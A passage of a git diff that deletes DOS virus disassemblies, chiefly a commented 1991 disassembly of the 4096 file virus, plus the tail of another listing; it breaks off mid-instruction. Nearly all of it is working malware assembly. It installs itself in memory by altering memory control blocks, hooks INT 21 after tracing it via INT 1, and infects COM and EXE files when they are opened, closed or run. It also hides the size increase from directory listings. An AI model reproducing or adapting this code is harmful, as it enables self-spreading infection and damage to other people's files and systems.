SUBROUTINE -; -; Called from: 6FB8:04D3, 04EC -; - -sub_20 proc near - cld ; Clear direction - pop ax - sub ax,si - add ax,di - push es - push ax - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retf ; Return far -sub_20 endp - - db 90h, 50h,0E8h,0E2h, 03h, 8Bh - -seg_a ends - - - - end start - - CROSS REFERENCE - KEY ENTRY POINTS - - seg:off type label - ---- ---- ---- --------------- - 6FB8:0100 far start - - Interrupt Usage Synopsis - - Interrupt 21h : set default drive dl (0=a:) - Interrupt 21h : get default drive al (0=a:) - Interrupt 21h : set DTA to ds:dx - Interrupt 21h : get date, cx=year, dx=mon/day - Interrupt 21h : set current dir, path @ ds:dx - Interrupt 21h : open file, al=mode,name@ds:dx - Interrupt 21h : close file, bx=file handle - Interrupt 21h : read file, cx=bytes, to ds:dx - Interrupt 21h : write file cx=bytes, to ds:dx - Interrupt 21h : move file ptr, cx,dx=offset - Interrupt 21h : get/set file attrb, nam@ds:dx - Interrupt 21h : get present dir,drive dl,1=a: - Interrupt 21h : get/set file date & time - - I/O Port Usage Synopsis - - Port 20h : 8259-1 int command - diff --git a/0-9/4096 (10).ASM b/0-9/4096 (10).ASM deleted file mode 100755 index da57d58..0000000 --- a/0-9/4096 (10).ASM +++ /dev/null @@ -1,1902 +0,0 @@ - -PAGE 59,132 - -; -; -; VIR_ -; -; Created: ??-??-?? -; Version: -; Code type: zero start -; Passes: 9 Analysis Options on: A -; -; Disassembled by: Sir John -- 11.MAR.1991 -; -; - -PSP_0A equ 0Ah ; (0000:000A=0) -MCB_0000 equ 0 ; (7DBC:0000=E9) -MCB_0001 equ 1 ; (7DBC:0001=275h) -MCB_0003 equ 3 ; (7DBC:0003=1503h) -all_len equ 1600h -jmp_len equ 3 -sav_file equ data_23 - virus_entry + jmp_len - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - org 0 - - db 00h - - jmp vir_1 -data_23 dw 20CDh ; old file -data_24 dw 0 ; (first 6 bytes) -data_25 dw 0 ; - check sum - db 0,0,0,0,0,0,0,0 -data_27 dw 0 ; + 0eh = original SS: -data_28 dw 0 ; + 10h = original SP - dw 0 -data_29 dd 0 ; + 14h = .EXE file entry point - db 0,0,0,0 -data_31 db 0 ; flag : 1-EXE, 0-COM -data_32 db 0FEh - db 3Ah -debug: push bp ;address is 0023 - mov bp,sp - push ax - cmp [bp+4],0C000h - jae loc_1_1 ; segment > C000 - mov ax,cs:data_68 - cmp [bp+4],ax - jna loc_1_1 -loc_1: pop ax - pop bp - iret ; Interrupt return -loc_1_1: cmp byte ptr cs:data_73,1 ; (CS:1250=0) - je loc_3 ; Jump if equal - mov ax,[bp+4] - mov word ptr cs:old_INT+2,ax ; (CS:122F=70h) - mov ax,[bp+2] - mov word ptr cs:old_INT,ax ; (CS:122D=0) - jc loc_2 ; Jump if carry Set - pop ax - pop bp - mov ss,cs:data_92 ; (CS:12DD=151Ch) - mov sp,cs:data_93 ; (CS:12DF=0) - mov al,cs:data_97 ; (CS:12E5=0) - out 21h,al ; port 21h, 8259-1 int comands - jmp loc_79 ; (0D40) -loc_2: - and word ptr [bp+6],0FEFFh - mov al,cs:data_97 ; (CS:12E5=0) - out 21h,al ; port 21h, 8259-1 int comands - jmp short loc_1 ; (0037) -loc_3: - dec cs:data_74 ; (CS:1251=0) - jnz loc_1 ; Jump if not zero - and word ptr [bp+6],0FEFFh - call sub_21 ; Save REGS in vir's stack - call sub_18 ; (0DBA) - lds dx,cs:old_INT_1 ; (CS:1231=0) Load 32 bit ptr - mov al,1 - call sub_27 ; Set INT 01 vector - call sub_20 ; Restore regs from vir's stack - jmp short loc_2 ; (0067) - - -; -; SUBROUTINE -; - -sub_1 proc near - push ds - push si - xor si,si ; Zero register - mov ds,si - xor ah,ah ; Zero register - mov si,ax - shl si,1 ; Shift w/zeros fill - shl si,1 ; Shift w/zeros fill - mov bx,[si] - mov es,[si+2] - pop si - pop ds - retn -sub_1 endp - -vir_1: mov cs:data_113,1600h ; (CS:135B=0) - mov cs:old_AX,ax ; (CS:12E3=0) - mov ah,30h - int 21h ; DOS Services ah=function 30h - ; get DOS version number ax - mov cs:dos_ver,al ; (CS:12EE=0) - mov cs:old_DS,ds ; (CS:1245=7DBDh) - mov ah,52h - int 21h ; DOS Services ah=function 52h - ; get DOS data table ptr es:bx - mov ax,es:[bx-2] - mov cs:data_68,ax ; (CS:1247=0) - mov es,ax - mov ax,es:[1] ; (5200:0001=0FFFFh) - mov cs:data_69,ax ; (CS:1249=0) - push cs - pop ds - mov al,1 - call sub_1 ; Get INT 01 vector - mov word ptr old_INT_1,bx ; (CS:1231=0) - mov word ptr old_INT_1+2,es ; (CS:1233=70h) - mov al,21h - call sub_1 ; Get INT 21 vector - mov word ptr old_INT,bx ; (CS:122D=0) - mov word ptr old_INT+2,es ; (CS:122F=70h) - mov byte ptr data_73,0 ; (CS:1250=0) - mov dx,offset debug - mov al,1 - call sub_27 ; Set INT 01 vector - pushf ; Push flags - pop ax - or ax,100h - push ax - in al,21h ; port 21h, 8259-1 int IMR - mov data_97,al ; (CS:12E5) - mov al,0FFh - out 21h,al ; port 21h, 8259-1 int comands - popf ; Pop flags - mov ah,52h - pushf ; Push flags - call dword ptr old_INT ; (CS:122D) - pushf ; Push flags - pop ax - and ax,0FEFFh - push ax - popf ; Pop flags - mov al,data_97 ; (CS:12E5=0) - out 21h,al ; port 21h, 8259-1 int comands - push ds - lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr - mov al,1 - call sub_27 ; Set INT 01 vector - pop ds - les di,old_INT ; (CS:122D=0) Load 32 bit ptr - mov word ptr ptr_INT_21,di ; (CS:1235=0) - mov word ptr ptr_INT_21+2,es ; (CS:1237=70h) - mov byte ptr data_70,0EAh ; (CS:124B=0) - mov data_71,offset INT_21 ; (CS:124C=0) (02CC) - mov data_72,cs ; (CS:124E=7DBDh) - call sub_18 ; (0DBA) - mov ax,4B00h - mov data_95,ah ; (CS:12E2=0) - mov dx,offset data_32 ; (CS:0021=0FEh) - push word ptr data_31 ; (CS:0020=0FE00h) - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx - pop word ptr data_31 ; (CS:0020=0FE00h) - add word ptr es:[di-4],9 - nop - mov es,old_DS ; (CS:1245) - mov ds,old_DS ; (CS:1245) - sub word ptr ds:[2],161h ; decrement mem size - mov bp,word ptr ds:[2] ; mem size - mov dx,ds - sub bp,dx - mov ah,4Ah - mov bx,0FFFFh - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov ah,4Ah - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - dec dx - mov ds,dx - cmp byte ptr ds:[MCB_0000],5Ah ; (7DBC:0000=0E9h) 'Z' - je loc_4 ; Jump if equal - dec cs:data_95 ; (CS:12E2=0) -loc_4: - cmp byte ptr cs:data_95,0 ; (CS:12E2=0) - je loc_5 ; Jump if equal - mov byte ptr ds:[MCB_0000],4Dh ; (7DBC:0000=0E9h) 'M' -loc_5: - mov ax,ds:MCB_0003 ; (7DBC:0003=1503h) - mov bx,ax - sub ax,161h - add dx,ax - mov ds:MCB_0003,ax ; (7DBC:0003=1503h) - inc dx - mov es,dx - mov byte ptr es:MCB_0000,5Ah ; (915F:0000=0) 'Z' - push cs:data_69 ; (CS:1249=0) - pop word ptr es:MCB_0001 ; (915F:0001=0) - mov word ptr es:MCB_0003,160h ; (915F:0003=0) - inc dx - mov es,dx - push cs - pop ds - mov cx,all_len/2 - mov si,all_len-2 ; (CS:15FE=0) - mov di,si - std ; Set direction flag - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - cld ; Clear direction - push es - mov ax,offset loc_1EE - push ax - mov es,cs:old_DS ; (CS:1245=7DBDh) - mov ah,4Ah ; 'J' - mov bx,bp - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - retf ; Return far - jump to loc_1EE -loc_1EE: call sub_18 ; (0DBA) - mov cs:data_72,cs ; (CS:124E=7DBDh) - call sub_18 ; (0DBA) - push cs - pop ds - mov byte ptr data_76,14h ; (CS:12A2=0) - push cs - pop es - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h - xor ax,ax ; Zero register - rep stosw ; Rep when cx >0 Store ax to es:[di] - mov data_103,al ; (CS:12EF=0) - mov ax,old_DS ; (CS:1245=7DBDh) - mov es,ax - lds dx,es:[0Ah] ; from offset 000A in PSP Load 32 bit ptr - mov ds,ax - add ax,10h - add word ptr cs:data_29+2,ax ; (CS:001A=1ED5h) - cmp byte ptr cs:data_31,0 ; (CS:0020=0) - jne loc_6 ; Jump if not equal -; restore infected .COM file and run it - sti ; Enable interrupts - mov ax,cs:data_23 ; (CS:0004=20CDh) - mov word ptr ds:[100h],ax ; (CS:0100=0E9Ah) - mov ax,cs:data_24 ; (CS:0006=340h) - mov word ptr ds:[102h],ax ; (CS:0102=589Ch) - mov ax,cs:data_25 ; (CS:0008=50C6h) - mov word ptr ds:[104h],ax ; (CS:0104=0Dh) - push cs:old_DS ; (CS:1245=7DBDh) - mov ax,100h - push ax - mov ax,cs:old_AX ; (CS:12E3=0) - retf ; Return far -loc_6: -; restore infected .EXE file and run it - add cs:data_27,ax ; (CS:0012=68Ch) - mov ax,cs:old_AX ; (CS:12E3=0) - mov ss,cs:data_27 ; (CS:0012=68Ch) - mov sp,cs:data_28 ; (CS:0014) original SP - sti ; Enable interrupts - jmp cs:data_29 ; (CS:0018=12Bh) -virus_entry: cmp sp,100h - ja loc_7 ; Jump if above - xor sp,sp ; Zero register -loc_7: - mov bp,ax - call sub_2 ; (0275) -sub_2: pop cx - sub cx,offset sub_2 - mov ax,cs - mov bx,10h - mul bx ; dx:ax = ax * 10 - add ax,cx ; cx = virus begin address - adc dx,0 - div bx ; ax,dx rem=dx:ax/10 - push ax ; ax = new segment - mov ax,offset vir_1 - push ax - mov ax,bp - retf ; Return far - jump to vir_1 - -table db 30h - dw offset _21_30 - db 23h - dw offset _21_23 - db 37h - dw offset _21_37 - db 4bh - dw offset _21_4B - db 3ch - dw offset _21_3C - db 3dh - dw offset _21_3D - db 3Eh - dw offset _21_3E - db 0Fh - dw offset _21_0F - db 14h - dw offset _21_14 - db 21h - dw offset _21_21 - db 27h - dw offset _21_27 - db 11h - dw offset _21_11_12 - db 12h - dw offset _21_11_12 - db 4Eh - dw offset _21_4E_4F - db 4Fh - dw offset _21_4E_4F - db 3Fh - dw offset _21_3F - db 40h - dw offset _21_40 - db 42h - dw offset _21_42 - db 57h - dw offset _21_57 - db 48h - dw offset _21_48 -end_tbl: -INT_21: cmp ax,4b00h - jnz loc_8_1 - mov cs:data_95,al -loc_8_1: push bp - mov bp,sp - push [bp+6] ; flags - pop cs:data_85 - pop bp ; ??? - push bp ; ??? - mov bp,sp - call sub_21 ; Save REGS in vir's stack - call sub_18 ; xchg info in INT 21 - call sub_15 ; BREAK = OFF - call sub_20 ; Restore regs from vir's stack - call sub_17 ; Save REGS - push bx - mov bx,offset table -loc_8: - cmp ah,cs:[bx] - jne loc_9 ; Jump if not equal - mov bx,cs:[bx+1] - xchg bx,[bp-14h] - cld ; Clear direction - retn -loc_9: - add bx,3 - cmp bx,offset end_tbl - jb loc_8 ; Jump if below - pop bx -loc_10: - call sub_16 ; Restore BREAK state - in al,21h ; port 21h, 8259-1 int IMR - mov cs:data_97,al ; (CS:12E5=0) - mov al,0FFh - out 21h,al ; port 21h, 8259-1 int comands - mov byte ptr cs:data_74,4 ; (CS:1251=0) - mov byte ptr cs:data_73,1 ; (CS:1250=0) - call sub_22 ; Set INT 01 for debuging - call sub_19 ; Restore REGS - push ax - mov ax,cs:data_85 ; (CS:12B3=0) - or ax,100h - push ax - popf ; Pop flags - pop ax - pop bp - jmp dword ptr cs:ptr_INT_21 ; (CS:1235=0) -loc_11: - call sub_21 ; Save REGS in vir's stack - call sub_16 ; (0D9B) - call sub_18 ; (0DBA) - call sub_20 ; Restore regs from vir's stack - pop bp - push bp - mov bp,sp - push cs:data_85 ; (CS:12B3=0) - pop word ptr [bp+6] - pop bp - iret ; Interrupt return -_21_11_12: call sub_19 ; Restore REGS - call sub_24 ; INT 21 - or al,al ; Zero ? - jnz loc_11 ; Jump if not zero - call sub_17 ; Save REGS - call sub_3 ; (0581) - mov al,0 - cmp byte ptr [bx],0FFh - jne loc_12 ; Jump if not equal - mov al,[bx+6] - add bx,7 -loc_12: - and cs:data_104,al ; (CS:12F0=0) - test byte ptr [bx+1Ah],80h - jz loc_13 ; Jump if zero - sub byte ptr [bx+1Ah],0C8h - cmp byte ptr cs:data_104,0 ; (CS:12F0=0) - jne loc_13 ; Jump if not equal - sub word ptr [bx+1Dh],1000h - sbb word ptr [bx+1Fh],0 -loc_13: - call sub_19 ; Restore REGS - jmp short loc_11 ; (033F) -_21_0F: call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; Save REGS - or al,al ; Zero ? - jnz loc_13 ; Jump if not zero - mov bx,dx - test byte ptr [bx+15h],80h - jz loc_13 ; Jump if zero - sub byte ptr [bx+15h],0C8h - sub word ptr [bx+10h],1000h - sbb byte ptr [bx+12h],0 - jmp short loc_13 ; (0396) -_21_27: jcxz loc_15 ; Jump if cx=0 -_21_21: mov bx,dx - mov si,[bx+21h] - or si,[bx+23h] - jnz loc_15 ; Jump if not zero - jmp short loc_14 ; (03D7) -_21_14: mov bx,dx - mov ax,[bx+0Ch] - or al,[bx+20h] - jnz loc_15 ; Jump if not zero -loc_14: - call sub_7 ; (0919) - jnc loc_16 ; Jump if carry=0 -loc_15: - jmp loc_10 ; (030F) -loc_16: - call sub_19 ; Restore REGS - call sub_17 ; Save REGS - call sub_24 ; INT 21 - mov [bp-4],ax - mov [bp-8],cx - push ds - push dx - call sub_3 ; (0581) - cmp word ptr [bx+14h],1 - je loc_17 ; Jump if equal - mov ax,[bx] - add ax,[bx+2] - add ax,[bx+4] - jz loc_17 ; Jump if zero - add sp,4 - jmp short loc_13 ; (0396) -loc_17: - pop dx - pop ds - mov si,dx - push cs - pop es - mov di,offset data_86 ; (CS:12B5=0) - mov cx,25h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov di,offset data_86 ; (CS:12B5=0) - push cs - pop ds - mov ax,[di+10h] - mov dx,[di+12h] - add ax,100Fh - adc dx,0 - and ax,0FFF0h - mov [di+10h],ax - mov [di+12h],dx - sub ax,0FFCh - sbb dx,0 - mov [di+21h],ax - mov [di+23h],dx - mov word ptr [di+0Eh],1 - mov cx,1Ch - mov dx,di - mov ah,27h ; ''' - call sub_24 ; INT 21 - jmp loc_13 ; (0396) -_21_23: push cs - pop es - mov si,dx - mov di,offset data_86 ; (CS:12B5=0) - mov cx,25h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - push ds - push dx - push cs - pop ds - mov dx,offset data_86 ; CS:12B5 - mov ah,0Fh - call sub_24 ; INT 21 - mov ah,10h - call sub_24 ; INT 21 - test byte ptr data_89,80h ; (CS:12CA=0) - pop si - pop ds - jz loc_20 ; Jump if zero - les bx,cs:data_88 ; (CS:12C5=0) Load 32 bit ptr - mov ax,es - sub bx,1000h - sbb ax,0 - xor dx,dx ; Zero register - mov cx,cs:data_87 ; (CS:12C3=0) - dec cx - add bx,cx - adc ax,0 - inc cx - div cx ; ax,dx rem=dx:ax/reg - mov [si+23h],ax - xchg ax,dx - xchg ax,bx - div cx ; ax,dx rem=dx:ax/reg - mov [si+21h],ax - jmp loc_13 ; (0396) -_21_4E_4F: and cs:data_85,0FFFEh ; (CS:12B3=0) - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; Save REGS - jnc loc_18 ; Jump if carry=0 - or cs:data_85,1 ; (CS:12B3=0) - jmp loc_13 ; (0396) -loc_18: - call sub_3 ; (0581) - test byte ptr [bx+19h],80h - jnz loc_19 ; Jump if not zero - jmp loc_13 ; (0396) -loc_19: - sub word ptr [bx+1Ah],1000h - sbb word ptr [bx+1Ch],0 - sub byte ptr [bx+19h],0C8h - jmp loc_13 ; (0396) -_21_3C: push cx - and cx,7 - cmp cx,7 - je loc_23 ; Jump if equal - pop cx - call sub_13 ; (0CC6) - call sub_24 ; INT 21 - call sub_14 ; (0D6C) - pushf ; Push flags - cmp byte ptr cs:data_90,0 ; (CS:12DA=0) - je loc_21 ; Jump if equal - popf ; Pop flags -loc_20: - jmp loc_10 ; (030F) -loc_21: - popf ; Pop flags - jc loc_22 ; Jump if carry Set - mov bx,ax - mov ah,3Eh ; '>' - call sub_24 ; INT 21 - jmp short _21_3D ; (0511) -loc_22: - or byte ptr cs:data_85,1 ; (CS:12B3=0) - mov [bp-4],ax - jmp loc_13 ; (0396) -loc_23: - pop cx - jmp loc_10 ; (030F) -_21_3D: - call sub_9 ; Get PSP segment - call sub_8 ; (0925) - jc loc_26 ; Jump if carry Set - cmp byte ptr cs:data_76,0 ; (CS:12A2=0) - je loc_26 ; Jump if equal - call sub_10 ; (097E) - cmp bx,0FFFFh - je loc_26 ; Jump if equal - dec cs:data_76 ; (CS:12A2=0) - push cs - pop es - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h - xor ax,ax ; Zero register - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - mov ax,cs:data_77 ; (CS:12A3=0) - mov es:[di-2],ax - mov es:[di+26h],bx - mov [bp-4],bx -loc_25: - and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - jmp loc_13 ; (0396) -loc_26: - jmp loc_10 ; (030F) -_21_3E: push cs - pop es - call sub_9 ; Get PSP segment - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h - mov ax,cs:data_77 ; (CS:12A3=0) -loc_27: - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - jnz loc_28 ; Jump if not zero - cmp bx,es:[di+26h] - jne loc_27 ; Jump if not equal - mov word ptr es:[di-2],0 - call sub_4 ; (0793) - infect file - inc cs:data_76 ; (CS:12A2=0) - jmp short loc_25 ; (0549) -loc_28: - jmp loc_10 ; (030F) - -; -; SUBROUTINE -; - -sub_3 proc near - push es - mov ah,2Fh ; '/' - call sub_24 ; INT 21 - push es - pop ds - pop es - retn -sub_3 endp - -_21_4B: or al,al ; Zero ? - jz loc_29 ; Jump if zero - jmp loc_36 ; (06E0) -loc_29: - push ds - push dx - mov cs:prm_blck_adr,bx ; (CS:1224) save EXEC block offset - mov word ptr cs:prm_blck_adr+2,es ; (CS:1226) save EXEC block segment - lds si,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC block address - mov di,offset exec_block ; (CS:12F1) - mov cx,0Eh - push cs - pop es - rep movsb ; Save EXEC param block - pop si - pop ds - mov di,offset file_name ; (CS:1307) - mov cx,50h - rep movsb ; Save file name - mov bx,0FFFFh - call sub_23 ; (0E3A) - call sub_19 ; Restore REGS - pop bp - pop cs:data_98 ; (CS:12E6=0) - pop cs:data_99 ; (CS:12E8=0) - pop cs:data_85 ; (CS:12B3=0) - mov ax,4B01h - push cs - pop es - mov bx,offset exec_block - pushf ; Push flags - call dword ptr cs:ptr_INT_21 ; (CS:1235=0) - jnc loc_30 ; Jump if carry=0 - or cs:data_85,1 ; (CS:12B3=0) - push cs:data_85 ; (CS:12B3=0) - push cs:data_99 ; (CS:12E8=0) - push cs:data_98 ; (CS:12E6=0) - push bp - mov bp,sp - les bx,dword ptr cs:prm_blck_adr ; (CS:1224=0) Load 32 bit ptr - jmp loc_11 ; (033F) -loc_30: - call sub_9 ; Get PSP segment - push cs - pop es - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h -loc_31: - mov ax,cs:data_77 ; (CS:12A3=0) - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - jnz loc_32 ; Jump if not zero - mov word ptr es:[di-2],0 - inc cs:data_76 ; (CS:12A2=0) - jmp short loc_31 ; (060B) -loc_32: - lds si,cs:entry_point ; (CS:1303=0) Load 32 bit ptr - cmp si,1 ; already infected? - jne loc_33 ; Jump if not equal - mov dx,word ptr ds:data_29+2 ; (0000:001A) - original entry point segment - add dx,10h - mov ah,51h - call sub_24 ; INT 21 - get PSP segment - add dx,bx - mov word ptr cs:entry_point+2,dx ; (CS:1305=0) - push word ptr ds:data_29 ; (0000:0018) - original entry point offset - pop word ptr cs:entry_point ; (CS:1303=0) - add bx,10h - add bx,ds:data_27 ; (0000:0012) - original SS: - mov cs:data_107,bx ; (CS:1301=0) - push word ptr ds:data_28 ; (0000:0014) - original SP - pop cs:data_106 ; (CS:12FF=0) - jmp short loc_34 ; (067F) -loc_33: - mov ax,[si] - add ax,[si+2] - add ax,[si+4] - jz loc_35 ; Jump if zero - push cs - pop ds - mov dx,offset file_name - call sub_8 ; (0925) - call sub_10 ; (097E) - inc cs:data_103 ; (CS:12EF=0) - call sub_4 ; infect file - dec cs:data_103 ; (CS:12EF=0) -loc_34: - mov ah,51h - call sub_24 ; INT 21 - call sub_21 ; Save REGS in vir's stack - call sub_16 ; (0D9B) - call sub_18 ; (0DBA) - call sub_20 ; Restore REGS from vir's stack - mov ds,bx - mov es,bx - push cs:data_85 ; (CS:12B3=0) - push cs:data_99 ; (CS:12E8=0) - push cs:data_98 ; (CS:12E6=0) - pop word ptr ds:PSP_0A ; offset 0A in PSP - pop word ptr ds:PSP_0A+2 ; offset 0C in PSP - push ds - lds dx,dword ptr ds:PSP_0A ; offset 0A in PSP - terminate address - mov al,22h - call sub_27 ; Set INT 22 vector - pop ds - popf ; Pop flags - pop ax - mov ss,cs:data_107 ; (CS:1301=0) - mov sp,cs:data_106 ; (CS:12FF=0) - jmp dword ptr cs:entry_point ; (CS:1303=0) -loc_35: - mov bx,[si+1] - mov ax,ds:[bx+si+sav_file] ; (0000:FD9F) - mov [si],ax - mov ax,ds:[bx+si+sav_file+2] ; (0000:FDA1) - mov [si+2],ax - mov ax,ds:[bx+si+sav_file+4] ; (0000:FDA3) - mov [si+4],ax - jmp short loc_34 ; (067F) -loc_36: - cmp al,1 - je loc_37 ; Jump if equal - jmp loc_10 ; (030F) -loc_37: - or cs:data_85,1 ; (CS:12B3=0) - mov cs:prm_blck_adr,bx ; (CS:1224=0) - mov word ptr cs:prm_blck_adr+2,es ; (CS:1226=7DBDh) - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; Save REGS - les bx,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC param block address - lds si,dword ptr es:[bx+12h] ; Load CS:IP from EXEC parameter block - jc loc_40 ; Jump if carry Set - and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - cmp si,1 ; infected .EXE ? - je loc_38 ; Jump if equal - mov ax,[si] - add ax,[si+2] - add ax,[si+4] - jnz loc_39 ; Jump if not zero - mov bx,[si+1] - mov ax,ds:[bx+si+sav_file] ; (013B:FD9F) saved original file - mov [si],ax - mov ax,ds:[bx+si+sav_file+2] ; (013B:FDA1) saved original file - mov [si+2],ax - mov ax,ds:[bx+si+sav_file+4] ; (013B:FDA3) saved original file - mov [si+4],ax - jmp short loc_39 ; (0765) -loc_38: - mov dx,word ptr ds:data_29+2 ; (013B:001A=2E09h) - call sub_9 ; Get PSP segment - mov cx,cs:data_77 ; (CS:12A3) - PSP segment - add cx,10h - add dx,cx - mov es:[bx+14h],dx - mov ax,word ptr ds:data_29 ; (013B:0018=7332h) - mov es:[bx+12h],ax - mov ax,ds:data_27 ; (013B:0012=2E08h) - add ax,cx - mov es:[bx+10h],ax - mov ax,ds:data_28 ; (013B:0014=3E80h) - mov es:[bx+0Eh],ax -loc_39: - call sub_9 ; Get PSP segment - mov ds,cs:data_77 ; (CS:12A3=0) - mov ax,[bp+2] - mov ds:PSP_0A,ax ; (0000:000A=0F000h) - mov ax,[bp+4] - mov word ptr ds:PSP_0A+2,ax ; (0000:000C=7F6h) -loc_40: - jmp loc_13 ; (0396) -_21_30: mov byte ptr cs:data_104,0 ; (CS:12F0=0) - mov ah,2Ah - call sub_24 ; INT 21 - cmp dx,916h - jb loc_41 ; Jump if below - call sub_28 ; (0FB2) -loc_41: - jmp loc_10 ; (030F) - -; -; SUBROUTINE - INFECTION -; - -sub_4 proc near - call sub_13 ; (0CC6) - call sub_5 ; (0855) - mov byte ptr data_31,1 ; (CS:0020=0) - cmp data_38,5A4Dh ; (CS:1200=0) - je loc_42 ; Jump if equal - cmp data_38,4D5Ah ; (CS:1200=0) - je loc_42 ; Jump if equal - dec byte ptr data_31 ; (CS:0020=0) - jz loc_45 ; Jump if zero -loc_42: -; .EXE file infect - mov ax,data_41 ; (CS:1204=0) - shl cx,1 ; Shift w/zeros fill - mul cx ; dx:ax = reg * ax - add ax,200h - cmp ax,si - jb loc_44 ; Jump if below - mov ax,data_43 ; (CS:120A=0) - or ax,data_44 ; (CS:120C=0) - jz loc_44 ; Jump if zero - mov ax,data_80 ; (CS:12A9=0) - mov dx,data_81 ; (CS:12AB=0) - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - or dx,dx ; Zero ? - jz loc_43 ; Jump if zero - inc ax -loc_43: - mov data_41,ax ; (CS:1204=0) - mov data_40,dx ; (CS:1202=0) - cmp data_48,1 ; (CS:1214=0) - je loc_46 ; Jump if equal - mov data_48,1 ; (CS:1214=0) - mov ax,si - sub ax,data_42 ; (CS:1208=0) - mov data_49,ax ; (CS:1216=0) - add data_41,8 ; (CS:1204=0) - mov data_45,ax ; (CS:120E=0) - mov data_46,1000h ; (CS:1210=0) BUG BUG BUG!!! - ; When .EXE file is infected, - ; the end of the virus wil be - ; damaged. (sp = 1000) - call sub_6 ; (08B3) -loc_44: - jmp short loc_46 ; (084C) -loc_45: -; .COM file infect - cmp si,0F00h ; file len in paragraphs - jae loc_46 ; Jump if above or = - mov ax,data_38 ; (CS:1200=0) - mov data_23,ax ; (CS:0004=20CDh) - add dx,ax - mov ax,data_40 ; (CS:1202=0) - mov data_24,ax ; (CS:0006=340h) - add dx,ax - mov ax,data_41 ; (CS:1204=0) - mov data_25,ax ; (CS:0008=50C6h) - add dx,ax - jz loc_46 ; Jump if zero - allready infected - mov cl,0E9h - mov byte ptr data_38,cl ; (CS:1200=0) - mov ax,10h - mul si ; dx:ax = reg * ax - add ax,265h - mov word ptr data_38+1,ax ; (CS:1201=0) - mov ax,data_38 ; (CS:1200=0) - add ax,data_40 ; (CS:1202=0) - neg ax - mov data_41,ax ; (CS:1204=0) - call sub_6 ; (08B3) -loc_46: - mov ah,3Eh ; '>' - call sub_24 ; INT 21 - call sub_14 ; (0D6C) - retn -sub_4 endp - - -; -; SUBROUTINE -; - -sub_5 proc near - push cs - pop ds - mov ax,5700h - call sub_24 ; INT 21 - mov data_53,cx ; (CS:1229=0) - mov data_54,dx ; (CS:122B=0) - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov ah,3Fh ; '?' - mov cl,1Ch - mov dx,1200h - call sub_24 ; INT 21 - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov ah,3Fh ; '?' - mov cl,1Ch - mov dx,4 - call sub_24 ; INT 21 - mov ax,4202h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov data_80,ax ; (CS:12A9=0) - mov data_81,dx ; (CS:12AB=0) - mov di,ax - add ax,0Fh - adc dx,0 - and ax,0FFF0h - sub di,ax - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - mov si,ax - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov ah,40h - mov cl,1Ch - mov dx,1200h - call sub_24 ; INT 21 - mov ax,10h - mul si ; dx:ax = reg * ax - mov cx,dx - mov dx,ax - mov ax,4200h - call sub_24 ; INT 21 - xor dx,dx ; Zero register - mov cx,1000h - add cx,di - mov ah,40h - call sub_24 ; INT 21 - mov ax,5701h - mov cx,data_53 ; (CS:1229=0) - mov dx,data_54 ; (CS:122B=0) - test dh,80h - jnz loc_47 ; Jump if not zero - add dh,0C8h -loc_47: call sub_24 ; INT 21 - cmp byte ptr dos_ver,3 ; (CS:12EE=0) - jb loc_ret_48 ; Jump if below - cmp byte ptr data_103,0 ; (CS:12EF=0) - je loc_ret_48 ; Jump if equal - push bx - mov dl,data_52 ; (CS:1228=0) - mov ah,32h - call sub_24 ; INT 21 - mov ax,cs:data_101 ; (CS:12EC=0) - mov [bx+1Eh],ax - pop bx -loc_ret_48: - retn -sub_6 endp - - -; -; SUBROUTINE -; - -sub_7 proc near - call sub_21 ; Save REGS in vir's stack - mov di,dx - add di,0Dh - push ds - pop es - jmp short loc_50 ; (0945) -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - call sub_21 ; Save REGS in vir's stack - save REGS - push ds - pop es - mov di,dx - mov cx,50h - xor ax,ax ; Zero register - mov bl,0 - cmp byte ptr [di+1],3Ah ; ':' - jne loc_49 ; Jump if not equal - mov bl,[di] - and bl,1Fh -loc_49: - mov cs:data_52,bl ; (CS:1228=0) - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al -loc_50: - mov ax,[di-3] - and ax,0DFDFh - add ah,al - mov al,[di-4] - and al,0DFh - add al,ah - mov byte ptr cs:data_31,0 ; (CS:0020=0) - cmp al,0DFh ; file name is ....COM - je loc_51 ; Jump if equal - inc byte ptr cs:data_31 ; (CS:0020=0) - cmp al,0E2h ; file name is ....EXE - jne loc_52 ; Jump if not equal -loc_51: - call sub_20 ; Restore regs from vir's stack - clc ; Clear carry flag - retn -loc_52: - call sub_20 ; Restore regs from vir's stack - stc ; Set carry flag - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - push bx - mov ah,51h - call sub_24 ; INT 21 - mov cs:data_77,bx ; 